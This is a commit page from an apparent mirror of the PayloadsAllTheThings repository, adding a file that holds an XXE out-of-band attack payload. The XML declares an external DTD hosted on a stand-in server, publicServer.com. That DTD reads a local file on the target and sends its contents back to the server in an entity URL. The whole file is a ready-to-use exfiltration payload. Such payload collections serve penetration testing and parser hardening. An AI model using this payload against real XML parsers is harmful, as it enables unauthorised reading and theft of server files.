mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2026-03-01 15:03:12 -08:00
Multiple update in READMEs + RCE tricks
This commit is contained in:
Swissky
9
XXE injection/Files/XXE OOB Attack (Yunusov, 2013).xml
Executable file
9
XXE injection/Files/XXE OOB Attack (Yunusov, 2013).xml
Executable file
@@ -0,0 +1,9 @@
|
||||
XXE OOB Attack (Yunusov, 2013)
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd">
|
||||
<data>&send;</data>
|
||||
|
||||
File stored on http://publicServer.com/parameterEntity_oob.dtd
|
||||
<!ENTITY % file SYSTEM "file:///sys/power/image_size">
|
||||
<!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>">
|
||||
%all;
|
||||
Reference in New Issue
Block a user